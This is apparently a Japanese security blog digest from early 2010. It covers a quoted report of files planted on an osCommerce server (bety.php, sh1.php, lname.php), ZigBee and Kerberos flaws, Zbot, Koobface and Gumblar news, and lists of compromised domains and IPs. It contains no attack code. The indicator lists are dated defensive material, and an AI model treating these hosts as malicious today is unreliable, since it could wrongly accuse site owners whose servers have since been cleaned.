Solution:
Restrict access to the "admin" folder (e.g. via an .htaccess file).
Do not visit untrusted sites while being logged in to the application.

が・・
What's New?
osCommerce 2.2 MS1のセキュリティ問題 (2007-02-18)
少なくとも更新がとまっている様子です。

本題：
Bety.php – osCommerce Hack. Part 1.
Around Dec 22 an attacker with a Russian IP deposited some files on my webserver. My hosting provider said access was gained through a since updated version of Wordpress, although my view of the logs indicates it was through an unsecured version of OSCommerce.

The attacker left 3 files on my server. No other files were changed. The main domain that was attacked is hXXp://wanlesstennis・com

the files were-
bety.php – a script with the title GoogleF#cker v1
sh1.php – some kind of redirect
lname.php -

osCommerceを使用中の方、あるいは使用中のサイトをご存知の方は、至急サイト内の調査を行い、この３ファイルがないかどうかチェックしてみてください。
存在すれば、クラッキングを受け、別ベクトルへの攻撃の踏み台にされていた可能性があります。

※コミュニティの停止しているOSSソリューションを使い続けるのは危険です。

----------
ZigBee
ZigBeeは、家電向けの短距離無線通信規格でIEEE 802.15.4で標準化されています。
Software error in ZigBee radio modules facilitates eavesdropping
そのZigBeeでプロトコルスタックとして標準的に使用されている Z-Stackの暗号化メソッドに脆弱な問題があり、簡単に盗聴できてしまうという話。

一応、修正版を出すようですが、ファームウェアレベルでハードライトされているものはどうにもならなそうですね・・

参考：
5分で絶対に分かるZigBee
IrDA、Bluetoothを反面教師にしたZigBeeの実力は？

----------
Kerberos
Another patch for MIT Kerberos
こないだの修正が正式リリースされたのかな？
Kerberos/LDAPな方は運用プランにパッチ適用をスケジューリングしましょう～

----------
いろり
zeus, trojan, exploit domains to block
190 new domains to add to your dns sinkhole or malware blocklist. Sources: www.malwareurl.com, malc0de.com, www.virustotal.com, and others:
zly .hacked .jp
ここに載ることだけは避けたいですね（苦笑）

usaa.comの偽サイト -- January 18, 2010
125.0.40.185 == nttkyo377185.tkyo.nt.ftth.ppp.infoweb.ne.jp
ここに逆引き名が載るのも避けたいですね（苦笑x2)

search = jp
hanadoki・info 210.188.201.13 sv60.xserver.jp AS9371 (SAKURA)
fitme・jp 203.183.67.71 mail.fitme.jp AS4694 (IDC)
godiego・net 210.233.74.147 ss147.kix.ad.jp AS9353 (MEDIAWARS)
imanishi4182・jp 164.46.163.173 mail.imanishi4182.jp AS9995 (FIRSTSERVER)
palette・jp 119.245.180.127 palette.jp AS2514 (INFOSPHERE)
ksp-eng.co・jp 203.183.63.43 mail.ksp-eng.co.jp AS4694 (IDC)
119.245.139.219 navihiroki.com AS2514 (INFOSPHERE) Koobface
money-tora・com 119.245.138.58 elitefx.jp AS2514 (INFOSPHERE) Koobface
122.103.188.201 s201.IhiroshimaFL7.vectant.ne.jp AS2519 (VECTANT) Trojan Zbot
125.0.40.185 nttkyo377185.tkyo.nt.ftth.ppp.infoweb.ne.jp AS2510 (INFOWEB) Trojan Zbot
202.157.7.115 gd202157007115.u17.kcn-tv.ne.jp AS23790 (KCN-TV) Trojan Zbot
以下略
ここに乗せられると、かなり恥ずかしいですので絶対にイヤです（苦笑x4)

----------
でじゃぶ～
Sendspace Zbot spreader a Flashback to Dec 15-20
Hey! Is this photo yours?
サイクルがあるのかな？

----------
i瓦
1月27日だ！　Appleから新製品発表イベントへの招待が来たぞ
アップル、1月27日に新製品イベントを開催。 "latest creation"を発表

さ～て、どんな瓦製品が出てくるのか！

----------
Gumblar vs ねこ！
ねこ最強！
ガンブラー vs 肉じゃが vs avast! vs 猫 vs MT
肉じゃが作りつつavast!インストールしつつブログ(MT)の調子がちょっとおかしいようなので調べつつ猫の湯たんぽがわりになりつつ別の猫は毛布をもみもみしつつさらに別の猫はPSF(ペロペロショートフィーバー)しつつ。
あ～美猫だなぁ～うらやましひ

え？何？そういうのはもういいって？いやいや。
シリーズ化希望です（笑）

----------
宿題
KiyoP様指摘の問題は、あとで検証します。

とおもったけど、
改竄いろいろ
でpuppet様が解析されていたので、とりあえずこちらで（笑）

----------
8080
91.121.4.99 AS16276(OVH Paris)
91.121.79.191 AS16276(OVH Paris)
91.121.88.218 AS16276(OVH Paris)
91.121.142.111 AS16276(OVH Paris)
94.23.4.164 AS16276(OVH Paris)
とうとう全部OVH

----------
Google Safe Browsing
| 1263844820 | B | [goog-black-hash 1.49099 update]
| 1263844802 | M | [goog-malware-hash 1.18730 update]
| 298988 | -1367(300355) Congratulations!! （かな？・・たぶん・・）
| 1259359 |
EoF